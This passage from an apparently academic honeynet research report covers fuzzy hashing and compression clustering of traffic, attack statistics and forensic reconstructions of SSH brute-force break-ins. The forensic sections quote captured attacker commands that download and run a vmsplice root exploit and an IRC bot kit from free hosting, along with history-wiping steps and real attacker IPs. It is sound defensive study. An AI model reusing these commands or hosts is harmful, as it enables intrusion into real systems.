Requirement is to create a fingerprint of the entire payload or parts of it that is unique
enough to be a representative of the payload and yet statistically balanced enough to
identify areas with similarities when compared with other flows. A solution to address to
represent variable size payloads as fixed size fingerprints is to hash them. A hash is a
mathematical formula that can generate a unique fixed size sequence. Hashing is
extensively used in computer security to identify the authenticity of a digital source.
Most widely used hashing algorithms are MD5 and SHA. The problem with hashing is
that a slight change in input can cause an avalanche effect and drastically change the
output. This will result in a unique hash for a slightly different payload. This result is
unacceptable for a system that requires the estimation of the a similarity between flows.
This will have a negative effect on the profile and will result in higher edit distances.
Thus similar flows will be marked by the system as entirely separate. Fuzzy hashing or
piecewise hashing solves this problem. It involves the ability to compare two distinctly
different items and determine a fundamental level of similarity (expressed as a
percentage) between the two [82]. This technique “spamsum” originated as an effort by
Dr. Andrew Tridgell [83] to find commonality between spam email messages. The
payload hashed with this technique is added to the profile.
Example:
Contents of file alphabet.txt: “ABCDEFGHIJKLMNOPQRSTUVWXYZ”
After Modification: “ABCDEFGHIJKLMNOPQRSTUVWXYZ Edited by Fahim”
Difference in hash can be illustrated in table below:
Before
After
md5
1d238b74da513ce35e129e7dc07060ad
fe1b01ed362cd84e549a6b397d0e3e74
fuzzy hashing
3:Pg/vmNKzug:Y/vmNKzug
3:Pg/vmNKzul6A4jFS:Y/vmNKzulrr
Table 9: Comparison of MD5 and Fuzzy Hashing
6.2.2.4. Clustering By Compression
Clusters are groups of objects that are similar according to the metric used. There are 2
main types of clustering:
1. Partional
2. Hierarchical
Partitional clustering algorithms are used to determine all clusters at once. They can
also be used as divisive algorithms in hierarchical clustering. Examples of few partitional
clustering algorithms include: k-means clustering, Fuzzy c-means clustering and QT
clustering.
38
Hierarchical clustering algorithms identify clusters based on previously established
knowledge of clusters. They are implemented as either agglomerative “bottom-up” or
divisive “top-down” algorithms
Rudi et al. [86] proposed a new universal method of clustering by using compression.
They implemented their technique in vast areas like genetics, music, image processing,
radio observations and language families. Their technique was based on the use of a
parameter free similarity distance measure called the Normalized Compression
Distance (NCD), for generation of a distance matrix. The results were then clustered
using a hierarchical clustering technique called the quartet method [86]. NCD is a
normalized representation of the normalized information distance NID and is given by:
NCD(x , y ) =
C (xy ) - min{C (x ),C (y )}
max{C (x ),C (y )}
NCD is now being used in areas of genome phylogeny, language families, clustering of
music, clustering of handwritten digits for OCR, radio observations, malware and
internet traffic classification and detection.
NID is a normalized representation of the information distance E(x,y). NID is
represented as:
NID(x , y ) =
max{K (x | y ), K (y | x )}
max{K (x ), K (y )}
Information Distance E(x,y) is “the length of the shortest binary program for the
reference universal prefix Turing machine that, with input x computes y, and with input y
computes x” [86] is given by the equation:
E (x , y ) = max{K (x | y ), K (y | x )}
Based on certain features we can see a likeness or dissimilarity among data obtained
from different sources. Rudi et al [86] proposed a method to manifest this likeness,
using a new similarity metric based on compression. This metric is parameter-free and
does not use any features or background knowledge about the data. Thus it can find
similarities in feature-based and non-feature based data. This compression based
similarity metric was developed as a normalized version of “information metric”.
The approach is to find significant similarity between two objects by compressing one,
given the information in the other and vice versa. Thus if two pieces are more similar,
then we can more succinctly describe one given the other. The mathematics involved is
based on Kolmogorov’s complexity theory [85].
Halvar Flake [89] along with Carrera and Erd´elyi [90] have shown comparison of
executable objects by implementing graph-based methodologies. Halvar Flake has also
applied this methodology to the analysis of malware. The idea is to extract information
used by worms. This is done by comparing different versions of the same executable by
disassembly of the binary. This approach gives insight into the actual information and
39
flow of the security vulnerability. Wehner [88] discussed a fast method for guessing the
family of an observed worm without disassembly.
Network traffic characterization has claimed a lot of work. However, very little work has
been done utilizing compression based clustering and classification. Wehner [88]
utilizes approach [85] to attempt this by compression to determine any similarities.
Kulkarni and Bush [91] have attempted similar methods based on Kolmogorov
complexity to monitor network traffic. They, however, do not use compression. Work
carried out by Evans and Barnett [92] to compare the complexity of legal FTP traffic with
illegal traffic, involved compression of sampled benign and attack FTP data from
servers. Kulkarni, Evans and Barnett [93] performed denial of service measures using
Kolmogorov complexity. This is estimated by computing an estimate of the entropy of
1’s contained in the packet. This is then checked over time using the method of a
complexity differential.
For our particular case we want to analyse data sets comprising of behavioural profiles
of network and system events, for which the number of clusters is not known and the
data are not labelled. Hierarchical clustering is fit for any unsupervised method. The
relationships are represented in the form of a dendrogram, which is customarily a
directed binary tree or undirected ternary tree. To construct the tree from a distance
matrix with entries consisting of the pair-wise distances between objects, we utilize the
tools provided by author. We made use of the freely available CompLearn toolkit
provided by the author [87]. This tool makes use of a heuristic to implement the quartet
method. The heuristic is called standardized benefit score S(t). The quartet method
proposed by the author is MQTC or minimum quartet tree cost problem, which is a NPhard graph optimization problem.
6.3. Results and Discussion
We shall now see how well this technique will help us cluster the profiles that we have
obtained. It will be a great achievement if we were able to detect worm like activity or
any anomaly based on benign profiles. This will create classifications based on
clustering.
A prototype of our method is explained here:
Proposed Hashed Technique
Packets
1
2
3
4
5
6
7
8
1
0
0.464706
0.476744
0.111842
0.184211
0.519737
0.566038
0.526316
2
0.464706
0
0.44186
0.458824
0.470588
0.594118
0.588235
0.6
3
0.476744
0.447674
0
0.47093
0.482558
0.604651
0.30814
0.616279
4
0.105263
0.458824
0.47093
0
0.173333
0.513333
0.559748
0.526667
5
0.177632
0.470588
0.482558
0.173333
0
0.496552
0.578616
0.510345
6
0.526316
0.594118
0.604651
0.526667
0.503448
0
0.408805
0.230159
7
0.578616
0.594118
0.319767
0.572327
0.584906
0.408805
0
0.421384
8
0.526316
0.605882
0.627907
0.526667
0.517241
0.246032
0.427673
0
Table 10: Proposed Hashed Technique
IRC Packets
HTTP Packets
40
Old Technique (NCD ONLY)
Packets
1
2
3
4
5
6
7
8
1
0
0.850746
0.786082
0.440789
0.447368
0.564935
0.83376
0.585526
2
0.849088
0
0.742952
0.845771
0.844113
0.855721
0.771144
0.859038
3
0.783505
0.73466
0
0.775773
0.768041
0.786082
0.099744
0.796392
4
0.440789
0.849088
0.773196
0
0.144068
0.480519
0.815857
0.412214
5
0.447368
0.84743
0.768041
0.144068
0
0.448052
0.815857
0.40458
6
0.571429
0.868988
0.793814
0.480519
0.474026
0
0.734015
0.344156
7
0.828645
0.769486
0.102302
0.815857
0.810742
0.731458
0
0.741688
8
0.592105
0.870647
0.806701
0.419847
0.419847
0.331169
0.744246
0
Table 11: Old Technique (NCD only)
The table above shows 8 packets extracted from our Honeynet pcap files. Packets 1-5
being HTTP based traffic packets, and Packets 6-8 being IRC based botnet traffic. Our
proposed approach manifests a high similarity amongst packets of HTTP and IRC
respectively. HTTP packets have a highest or farthest similarity score of 0.482558 with
each other, which can be treated as the upper threshold value. IRC packets have a
farthest similarity score of 0.408 with each other. This gives us a general idea of
characteristics of traffic that the compressor can see.
Analysis of this scheme reveals that compression after hashing the payload is a far
better approach than simply hashing the entire payload. As illustrated in the table, the
hashed payload has resulted in almost twice more compression as previous technique.
This technique can be applied to the work done by Wehner [88] to obtain an even better
classification of worms. In her work Wehner [88] has implemented Cilibrasi’s technique
[86] of clustering based on Kolmogorov’s complexity [85] for clustering malware. The
approach is similar to our work but varies greatly in implementation as we use fuzzy
hashing first. It is fruitful but requires more resources depending on the size of the
malware being observed. Since we can represent an entire or part of the malware using
fuzzy hashing, it is quite possible to achieve better results with less complexity and
more robustness.
Another promising avenue discovered from this result is classification of traffic based on
compression results. When intersected with each other these packets give much higher
values than the upper thresholds observed. Packet 3 when compressed with packet 7 is
however an exception. Although these packets are very dissimilar and, like others in
their group are expected to give a higher or farther similarity score (i.e. greater than
0.5), it is found that they don’t. The resulting value is 0.3, suggesting a very high
similarity. This is also visible in the clustering graph shown in the figure below. This
leads to the question “Is hashing the entire ASCII payload meeting the expected
results?”, “Should we break up the payload and then hash the pieces?”, “How many
bytes of the payload should be considered as a standard window size?” This is an
interesting research area that we aim to address in future.
41
Figure 10: Clustering by Compression and hashing
42
Chapter 7: Results
Figure 11: Honeynet Data Graphical view (ip-port)
7.1. Summary
The virtual Honeynet was online for a period of approximately 60 days from 15th
September 2008 to 15th November, 2008. During this period we received over 30,000
identifiable attack connections. The attack results were documented as attacked ports
and services, Attacker IP’s and Country of Origin. The first attack was documented after
4 days of setting up the Honeynet. After several port scans an attacker attempted a
SSH brute force attack from “82.99.xx.xxx”. Geo-location of the IP was retrieved [23]
after several hundred attempts the attacker was successful in brute forcing a user
account. A botnet client was installed from a free webhosting server and IRC [25]
communication was initiated; the chat sessions were translated from Romanian to
English using Google Translate service [24]. The tools and chat/commands were
retrieved from this session successfully for further forensic analysis. During the project,
five similar sophisticated attacks were observed, from which valuable information and
tools have been successfully retrieved. Forensic analysis have revealed a depth of
information on the attackers, their organization into groups, their ties with each other
and some system credentials were logged during the chat exchange. After analysis we
came to conclude that attackers originating from Europe are commanding an overly
large army of zombie hosts in China and the US to gain access to targets across the
globe. Servers are always a high value target for them as they offer a variety of services
over stable high speed links. Figure 11 shows a graphical representation of all the
Honeynet data in the form of a linked graph. Red nodes represent Source IP’s, Green
nodes represent Destination IP’s, Blue nodes are the destination ports and the Yellow
node represents the Honeypot.
43
7.2. Attack Statistics
Figure 12: Probed Ports
22
43
53
80
12 3
135
137
138
139
443
445
1101
32 83
5353
6666
6667
31337
34405
34611
38852
412 86
42 661
43495
45618
46081
47645
47653
5032 7
532 13
56594
5702 9
60372
We have analysed attacks targeting our Honeynet over a period of 30 days (September
12th to October 12th), and documented them as:

Attacked/Probed ports and services

Attacker IP's

Attackers Country of Origin
7.2.1. Attacked Ports and Services
Taking a small sample of attacked ports and services. It has been observed that out of
total of 29643 probed ports and services, 29048 were targeted at SSH. This indicates
the attackers' focus on brute force means to gain access of the server. This is followed
by a high activity on IRC ports indicating botnet activity.
7.2.2. Attacker IP's
During its 30 day tenure the Honeypot received 34263 attacks from 615 unique IP's. A
43
great amount of these attacks originated from Europe and China
53
Figure 14: Probed ports (excluding SSH)
Figure 13: Top 10 Attackers and Attack
Magnitude
80
12 3
135
137
138
139
443
445
1101
32 83
5353
6666
6667
31337
34405
34611
38852
412 86
42 661
43495
45618
46081
47645
47653
5032 7
532 13
56594
5702 9
60372
44
7.2.3. Attacker’s Country of Origin
615 unique attacker IP addresses were identified originating from 79 countries across
the globe. Out of these 79 countries the highest number of attacks came from China
and Europe followed by the US. This proportion also stands for the highest attack
frequencies.
Top 50 Attacks by Country - Pie
Chart
US
AU
CZ
KR
UA
TW
ES
NL
KR
PK
CL
JO
RU
NZ
RO
IR
GD
DK
JP
EC
1776
2099
2940
778
1237
978
738
1237
628
307
134
93
93
39
39
24
23
23
19
17
Figure 15: Top 50 Attacks by Country
45
7.3. Forensic Analysis
7.3.1. First Hack
September 20th, 2008
INTERPRETATION:
The attacker gains access on the system, checks running processes and kills the user cron process.
Then after checking users connected to the box the attacker changes the user password. Next he
gathers system information and based on the system he downloads his botkit to the /tmp directory. The
attacker then runs the botkit and unsets History log environment variables to /dev/null. Finally he loads
up his users file and after verifying everything is configured and working well he exits the system.
Refer to Appendix B for Sebek and SSH Logs
Table 12: Forensics: Hack
7.3.2. Brute Force and Botnets
Oct 6th to 8th, 2008
INTERPRETATION
[2008-10-17 15:32:57 ]-
Unsetting and Deleting History logging:
After gaining user shell access on the system, the hacker checks users currently connected on the
system and unsets history environment variables and deletes the user .bash_history file.
Information Gathering:
System information such as system uptime and host information, cpuinfo such as number of
processors, instruction set and cache is gained by the hacker.
The botkit:
After making sure his activities wont be logged and getting system information the attacker downloads
his IRC bot in a hidden folder into one of the least used shared system directory /dev/shm. IRC Bots
are tools that can control a compromised system remotely via IRC chat channels that the compromised
system is set to listen to. Using IRC to control a compromised system is much more covert than using
SSH directly, as the attacker does not have to directly log into the system anymore. Further, it allows
the attacker to control several such systems, also known as Zombies, at the same time. IRC bots are
available freely for legitimate uses of controlling and maintaining IRC channels, however those
customized for malicious intent will now be termed as botkits.
Table 13: Forensics: Brute Force and Botnets
7.3.3. More Botnets
October 18, 2008
92.81.123.209
auth.log.0:Oct 19 07:32:02 paul-desktop sshd[13538]: Accepted password for john from 92.81.123.209
port 54571 ssh2
INTERPRETATION:
Most probably the attacker’s ip, as he knew the password directly without any wrong attempts
whatsoever.
Conclusion:
1. Attackers upload botkits on free webhosting sites as jpegs. The reason being that webhosting
companies maybe, do not scan jpeg files, or treat them differently.
2. Its our responsibility to inform these webhosting companies of the illicit content that is being hosted
by them and exploited by attackers.
46
Table 14: Forensics: More Botnets
7.3.4. Coordinated Attacks
23rd October, 2008
88.191.98.14 and 91.22.242.105
INTERPRETATION:
The attacker brute forced the server using an ssh scanner from 88.191.98.14 and immediately
connected to it using 91.22.242.105. After getting shell access as user the attacker checks for current
online users and system cpu information. Then he downloads his botkit onto the server. He then
extracts, configures and runs the botkit and after verifying everything is running successfully, he
deletes the file. This particular hacker however doesnt seem to care too much about clearing up his
tracks by deleting history and leaves the history file intact. (rather careless for a skillful hacker)
Deutsche Telekom was informed of this attack and necessary logs were provided to block the attacker.
Table 15: Forensics: Coordinated Attacks
7.3.5. Local Privilege Escalation attempt
91.22.238.14 24th October, 2008
Sebek Logs:
INTERPRETATION
The attacker gains access of the system.
Determines CPU information.
Downloads exploit tools appropriate to
the host architecture and OS and
attempts to escalate his privileges on the
system. This attempt was however not
successful.
w exit
ps x
ls
cat /proc/cpuinfo
exit
uname -a
sudo su
wget ciofu.altervista.org/xpl
chmod +x xpl
./xpl
w history
$ ls
Desktop Documents Examples Music Pictures Public Templates Videos xpl
john@paul-desktop:~$ ./xpl
----------------------------------Linux vmsplice Local Root Exploit
By MarkyZuL
----------------------------------[-] mmap: Permission denied
Table 16: Forensics: Local Privilege Escalation attempt
7.3.6. Forensics of an Encrypted Botnet
86.55.235.80 5th and 7th November:
/var/log/auth.log:Nov 5 20:01:22 paul-desktop sshd[21290]: Accepted password for john from 86.55.235.80 port 1684 ssh2
/var/log/auth.log:Nov 7 16:38:07 paul-desktop sshd[23247]: Accepted password for john from 86.55.235.80 port 2916 ssh2
[2008-11-05 07:01:32 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#w
[2008-11-05 07:01:40 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#uname -a
[2008-11-05 07:01:46 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#ps x
[2008-11-05 07:01:55 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#ls -a
[2008-11-05 07:02:10 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cat .bash_history
[2008-11-05 07:03:17 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cat /proc/cpuinfo
[2008-11-05 07:03:28 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#passwd
[2008-11-05 07:06:45 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#cd xpl
[2008-11-05 07:07:22 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#chmod +x xpl
[2008-11-05 07:09:47 Host:130.195.4.20 UID:1001 PID:21293 FD:0 INO:2 COM:bash ]#./xpl
---------------------------------Linux vmsplice Local Root Exploit
By MarkyZuL
-----------------------------------
47
[-] mmap: Permission denied
[2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#wget
http://www12.asphost4free.com/mrtiger/psybnc-linux.tgz ; tar zxvf psybnc-linux.tgz ; cd psybnc-linux ; cd psybnc ; chmod
+x * ; ./psybnc
[2008-11-07 03:38:40 Host:130.195.4.20 UID:1001 PID:23251 FD:0 INO:3 COM:bash ]#ls -a
INTERPRETATION:
The attacker was aware of the password and connected in single attempt. He then downloaded a psy-bnc botkit
that listens on
port 31337Analysis of the 31337 logs yielded nicks of the attackers “braincode” “impertinent” and “JSP” a simple
google search showed a server allowing open directory access which had irc files containing data from these 3
nicks:
http://203.188.159.61/cgvak/wq/
which is hosting Australian websites
psyBNC is an easy-to-use, multi-user, permanent IRC-Bouncer with many features
Analysis of the 31337 logs yielded nicks of the attackers “braincode” “impertinent” and “JSP” a simple google
search showed a server allowing open directory access which had irc files containing data from these 3 nicks:
http://203.188.159.61/cgvak/wq/
which is hosting Australian websites
Table 17: Forensics of Encrypted Botnet
7.3.6.3. Forensics of a Hacker’s IRC session
Observations and Comments:
After brute forcing into our Linux Honeypot one attacker downloaded his botkit, configured, compiled and executed
it, thus adding our Honeypot to his existing botnet chain originating from Netherland(195.47.220.2). The attackers
did not encrypt their IRC session as a result we were able to collect and analyze logs from this plain text IRC
session. Focusing on a single event we see 4 hackers communicating under the aliases
“luv!~bido”,”Dracos!~Volk3R”,”Muzik! Mytzu” and “dog!~dog”. The language used by the attackers was checked
using Google translator and it was revealed to be Romanian. The attackers indulged into a very casual and
informal conversation. Making fun of each others skills, teasing and abusing each other and in between that
exchanging critical information on subnets scanned, vulnerabilities and vulnerable hosts, target ip's and most
importantly username and passwords setup on compromised hosts. All this and many more going over the wire in
plain text. To our excitement discussing some compromised hosts, hacker “luv!~bido” reveals FTP credentials for a
compromised machine in Germany (62.75.252.121). We now had credentials of a machine owned by the hackers
themselves.
Table 18: Forensic of a hackers IRC session
8. Achievements





I have been successful in getting a paper published at the recent Australasian
Telecommunications Networks and Applications Conference (ATNAC, 2009),
held in Canberra, Australia in November, 2009.
I have presented my paper there at Canberra, Australia.
I have prepared a Poster on my work.
I have setup a virtual Honeynet at Massey University.
Collaborated with industry by setting up a Honeynet at a web-hosting company
known as Spinning Planet.
48
9. Research Plan
49
References:
[1] Spitzner.L (2002). Honeypots: Tracking Hackers. US: Addison Wesley. 1-430..
[2] Stoll, C. The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer
Espionage. Pocket Books, New York, 1990
[3] Cheswick, B. (1991). “An Evening with Berferd, in Which a Cracker Is Lured,
Endured, and Studied.” Forum of Incident Response and Security Teams
(FIRST).
[4] The Honeynet Project http://project.Honeynet.org
[5] CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess Control
Servicehttp://www.cert.org/advisories/CA-2001-31.html
[6] Provos, N and Holz, T (July 26, 2007). Virtual Honeypots: From Botnet Tracking
to Intrusion Detection. US: Addison-Wesley Professional.
[7] Talabis, R. (2005). The Gen II and Gen III Honeynet Architecture. Available:
http://www.philippineHoneynet.org/index2.php?option=com_docmanandtask=doc
_viewandgid=11andItemid=29. Last accessed June, 2008.
[8] William Stallings, “Cryptography and Network Security Principles and Practices”,
Third Edition, Prentice Hall, 2003.
[9] Security architecture for open systems interconnection for CCITT applications,
ITU-T, Study Group VII - Data Communications Networks, 1991
[10] Snort user manual 2.8.3 , www.snort.org
[11] Know Your Enemy: Sebek, A kernel based data capture tool, The Honeynet
Project, http://www.Honeynet.org, Last Modified: 17 November 2003
[12] Shuja, F. (October, 2006). Virtual Honeynet: Deploying Honeywall using
VMware . Available: http://www.Honeynet.pk/Honeywall/index.htm. Last
accessed June, 2008.
[13] Robert McGrew, Rayford B. Vaughn, JR. Experiences With Honeypot Systems:
Development,Deployment, and Analysis. Proceedings of the 39th Hawaii
International Conference on System Sciences – 2006.
[14] Levine.J, LaBella.R, Owen.H, Contis.D, Culver.B. (2003). The Use of
Honeynets to Detect Exploited Systems. Proceedings of the 2003 IEEE. 3 (2),
[15] McGrew.R, Rayford B. Vaughn, JR. (2006). Experiences With Honeypot
Systems:Development, Deployment, and Analysis. Proceedings of the 39th
Hawaii International Conference on System Sciences.
[16] Edward, B and Camilo, Viecco. (2005). Towards a Third Generation Data
Capture Architecture for Honeynets. Proceedings of the 2005 IEEE, Workshop
on Information Assurance and Security, United States Military Academy, West
Point, NY. 1 (1), p21-28.
[17] Snort, 2006, SNORT - The de facto standard on Intrusion Detection and
Prevention, www.Snort.org
[18] VMware. (2008). VMware Server 1.0.6 Free.
Available: http://www.vmware.com/download/server . Last accessed 20 Aug
2008.
[19] VMware. (2006). VMware Server Virtual Machine Guide.Available:
http://pubs.vmware.com/server1/wwhelp/wwhimpl/js/html/wwhelp.htm . Last
accessed 2 August 2008.
50
[20] “The Honyenet Project, 1999”.
[21] Duncan Napier. IPTables/NetFilter – Linux’s next generation stateful packet
filter. Sys Admin: The Journal for UNIX Systems Administrators, 10(12):8, 10, 12,
14, 16, December 2001.
[22] The Honeynet Project. (2005). Know Your Enemy: Honeywall CDROM Roo.
Available: http://old.Honeynet.org/papers/cdrom/Roo/index.html. Last accessed 5
May 2008.
[23] V. N. Padmanabban and L. Subramanian. Determining the geographic location
of Internet hosts. In SIGMETRICS/Performance, pages 324–325, 2001.
[24] Google.com. (2009). Google Translate. Available:
http://translate.google.com/ . Last accessed 15 December 2008.
[25] J. Oikarinen and D. Reed, “Internet Relay Chat Protocol RFC 1495,” 1993.
[26] Paul Barham , Boris Dragovic , Keir Fraser , Steven Hand , Tim Harris , Alex Ho
, Rolf Neugebauer , Ian Pratt , Andrew Warfield, Xen and the art of virtualization,
Proceedings of the nineteenth ACM symposium on Operating systems principles,
October 19-22, 2003, Bolton Landing, NY, USA
[27] VirtualBox. (2004). Sun VirtualBox® User Manual. Available:
http://www.virtualbox.org/manual/UserManual.html
Last accessed 20 July 2008.
[28] S. Marcinkowski, Extranets: The Weakest Link and Security, 2001.
[29] Arnold, T. (2001). A Method for Securing Credit Card and Private Consumer
Data in EBusiness Sites : CyberSource Corporation
[30] Defence in Depth: A practical strategy for achieving Information Assurance in
today’s highly networked environments
[31] S.L. Shaffer and A.R. Simon, "Network," Security, Academic Press, 1994.
[32] S.G. Schwartz, Practical Unix and Internet Security, 3rd Editio, O'Reilly Media,
Inc, 2003.
[33] M. Gasser, Building a secure computer system, 1988.
[34] Digital Forensics Research Workshop. “A Road Map for Digital Forensics
Research” 2001. www.dfrws.org
[35] Caloyannides, Michael A. Computer Forensics and Privacy. Artech House, Inc.
2001.
[36] S. Mukkamala and A.H. Sung, "Identifying Significant Features for Network
Forensic Analysis Using Artificial Intelligent Techniques," International Journal,
vol. 1, 2003, pp. 1-17.
[37] S. Hansman and R. Hunt, "A taxonomy of network and computer attacks,"
Computers and Security, vol. 24, 2005, pp. 31-43.
[38] E.D. Security, "A Guide to Cyber Crime Security in 2010," Security, 2009, p. 3.
[39] B. Cox, "Dress Your E-Security in Layers," internet.com, 2001, p. 1.
[40] Cohen, Frederick B., Protection and Security on the Information
Superhighway, John Wiley and Sons, Inc., 1995
[41] P. Innella, "A Brief History of Network Security and the Need for Adherence to
the Software Process Model," Information Security, 2008, pp. 1-15
[42] Lipson HF. Tracking and tracing cyber-attacks: technical challenges and global
policy issues. Technical report, CERT Coordination Center; November 2002.
[43] CERT, "CERT Statistics (Historical)," Incident Reports Received, 2009, p. 1.
51
[44] W. Stallings, "Internet," Security Handbook, IDG Books Worldwide, In, 1995.
[45] Alexander, Michael, The Underground Guide to Computer Security,
Addison-Wesley Publishing Company, 1996.
[46] CERT/CC, "CERT® Advisory CA-2003-04 MS-SQL Server Worm," CERT/CC,
Carnegie Mellon University, 2003, p. 1.
[47] CERT/CC, "CERT® Advisory CA-2003-20 W32/Blaster worm," CERT/CC,
Carnegie Mellon University., 2003, p. 1.
[48] CERT-In, "CERT-In Incident Note CIIN-2004-06," CERT-In, 2004, p. 1.
[49] Us-cert, "Technical Cyber Security Alert TA09-088A," National Cyber Alert
System, 2009, p. 1.
[50] P.J. Wade H. Baker Alex Hutton C. David Hylender, Christopher Novak
Christopher Porter Bryan Sartin Peter Tippett, M.D., "2009 Data Breach
Investigations Report," Business, 2009
[51] J. Northcutt, Stephen Novak, Network Intrusion Detection, New Riders, 2003.
[52] C. Kreibich and J. Crowcroft, "Honeycomb - creating intrusion detection
signatures using Honeypots," In Proceedings of the 2nd Workshop on Hot Topics
in Networks (HotNets-II) HotNets-II, 2003.
[53] J. Newsome, B. Karp, and D. Song, "Polygraph: Automatically generating
signatures for polymorphic worms," Proc. of the 2005 IEEE Symposium on
Security and Privacy, vol. pp, pp. 226-241, May 2005.
[54] M.M. Mohammed, H.A. Chan, and N. Ventura, "Honeycyber: automated
signature generation for zero-day polymorphic worms," Proc. of the IEEE Military
Communications Conference, MILCOM, 2008, pp. 1-6, 2008.
[55] H.-A. Kim and B. Karp, "Autograph: Toward automated, distributed worm
signature detection," Proc. of 13 USENIX Security Symposium, San Di- ego, CA,
Aug., 2004.
[56] S. Singh, C. Estan, G. Varghese, and S. Savage, "Automated worm
fingerprinting," Proc. Of the 6th conference on Symposium on Operating Systems
Design and Implementation (OSDI), Dec, 2004.
[57] J. Levine, R.L. Bella, H. Owen, D. Contis, and B. Culver, "The use of Honeynets
to detect exploited systems across large enterprise networks," Proc. of 2003
IEEE Workshops on Information Assurance, New York, Jun, 2003, pp. 92-99.
[58] Niels Provos. Honeyd - A Virtual Honeypot Daemon. In 10th DFN-CERT
Workshop, Hamburg, Germany, February 2003.
[59] J. Newsome, B. Karp, and D. Song, "Polygraph: Automatically generating
signatures for polymorphic worms," Proc. of the 2005 IEEE Symposium on
Security and Privacy, vol. pp, pp. 226-241, May, 2005.
[60] Z. Li, M. Sanghi, Y. Chen, M. Kao, and B.C. Hamsa, "Fast Signature Generation
for Zero-day Polymorphic Worms with Provable Attack Resilience," Proc. of the
IEEE Symposium on Security and Privacy, Oakland, CA, May, 2006.
[61] L. Cavallaro, A. Lanzi, L. Mayer, and M. Monga, "LISABETH: Automated
Content-Based Signature Generator for Zero-day Polymorphic Worms," Proc. of
the fourth international workshop on Software engineering for secure systems,
Leipzig, Germany, May, 2008.
[62] M.M. Mohammed, H.A. Chan, and N. Ventura, "Honeycyber: automated
signature generation for zero-day polymorphic worms," Proc. of the IEEE Military
Communications Conference, MILCOM, 2008, pp. 1-6.
52
[63] R.Sommer and V. Paxson. Enhancing byte-level network intrusion detection
signatures with context. In 10th ACM Conference on Computer and
Communication Security (CCS), Washington, DC, October 2003
[64] R. Agrawal, T. Imielinski, and A. Swami. Mining association rules between sets
of items in large databases. In ACM SIGMOD International Conference on
Management of Data, 1993.
[65] F. Pouget and M. Dacier. Honeypot-based forensics. In AusCERT Asia Pacific
Information technology Security Conference 2004 (AusCERT2004), Brisbane,
Australia, May 2004.
[66] K. Julisch. Clustering intrusion detection alarms to support root cause analysis.
ACM Transactions on Information and System Security (TISSEC), 6(4):443–471,
November 2003.
[67] M. Christodorescu, S. Seshia, S. Jha, D. Song, and R. E. Bryant. Semanticsaware malware detection. In IEEE Symposium on Security and Privacy, Oakland,
California, May 2005.
[68] J. Jung, V. Paxson, A. W. Berger, and H. Balakrishnan. Fast port-scan
detection using sequential hypothesis testing. In IEEE Symposium on Security
and Privacy, Oakland, California, May 2004
[69] S. Staniford, J. A. Hoagland, and J. M. McAlerney. Practical automated
detection of stealthy portscans. Journal of Computer Security, 10(1/2):105–136,
2002.
[70] V. Yegneswaran, J. Giffin, P. Barford, and S. Jha, "An architecture for
generating semantics-aware signatures," Proc. of the 14th conference on
USENIX Security Symposium, 2005.
[71] Yong Tang, Shigang Chen," An Automated Signature-Based Approach against
Polymorphic Internet Worms," IEEE Transaction on Parallel and Distributed
Systems, pp. 879-892 July 2007.
[72] Yi-Min Wang et al, “Automated Web Patrol with Strider HoneyMonkeys: Finding
Web Sites That Exploit Browser Vulnerabilities,” Proc. of the 4th ACM
SIGPLAN/SIGOPS international conference on Virtual execution environments,
pp. 171-180, Seattle, WA, USA, 2008.
[73] W. E. Leland, M. S. Taqqu, W. Willinger, and D. V. Wilson, “On the self-similar
nature of ethernet traffic (extended version),” IEEE/ACM Trans. Networking, vol.
2, pp. 1–15, Feb. 1994.
[74] D.E. Denning and An, "Intrusion," Detection Model, IEEE Transactions on
Software Engineering, SE-13, 1987, pp. 222-232.
[75] Varun Chandola, Arindam Banerjee, and Vipin Kumar, Anomaly Detection: A
Survey, ACM Computing Surveys, Vol. 41(3), Article 15, July 2009
[76] V.V. Phoha, "The Springer Internet Security Dictionary," Springer-Verlag. Phua,
C., Alahakoon, D., and Lee, V, vol. 61, 2002, pp. 50-59.
[77] Wikipedia, "Behaviour," 2010, p. 1.
[78] J.M. Estevez-Tapiador, P. Garcia-Teodoro and J.E. Diaz-Verdejo, “Anomaly
detection methods in wired networks: a survey and taxonomy”, Computer
Communications 27,pp. 1569-1584, 2004.
[79] S.Y. Lim, A. Jones, K. Lumpur, S.R. Centre, and U. Kingdom, "Network
Anomaly Detection System: The State of Art of Network Behaviour Analysis,"
Security, 2008, pp. 459-465.
53
[80] K. Scarfone and P. Mell, Guide to Intrusion Detection and Prevention Systems
(IDPS), tech. report 800-94, Nat’l Inst. Standards and Technology , US Dept. of
Commerce, 2007.
[81] M. Pe, M. Grill, and J. Stiborek, "Adaptive Multiagent System for Network Traffic
Monitoring," Intelligent Systems, IEEE, vol. 24, 2009, pp. 16 - 25.
[82] F. Clarity, U. Fuzzy, H. Techniques, and I.M. Code, "“FUZZY CLARITY” Using
Fuzzy Hashing Techniques to Identify Malicious Code – 1 –," 2007, pp. 1-18.
[83] Tridgell, Dr. Andrews. (2003). SpamSum.
http://samba.org/ftp/unpacked/junkcode/spamsum/README
[84] "Unveiling the Security Illusion: The need for active network forensics," Solera
Networks, 2010, p. 11.
[85] M. Li and P.M.B. Vit´anyi. An Introduction to Kolmogorov Complexity and its
Applications, Springer-Verlag, New York, 2nd Edition, 1997.
[86] R. Cilibrasi and P. Vitanyi, "Clustering by compression," IEEE Trans.
Information Theory, vol. 51, 2005, p. 4.
[87] R. Cilibrasi, The CompLearn Toolkit, 2003,
http://complearn.sourceforge.net/.
[88] S. Wehner, "Analyzing Worms and Network Traffic using Compression," Work,
2008.
[89] H. Flake, "Structural comparison of executable objects," In DIMVA, vol. pages,
2004, pp. 161-173.
[90] E. Carrera and F.C. Team, "2. Programming ida pro," 2004, pp. 187-197.
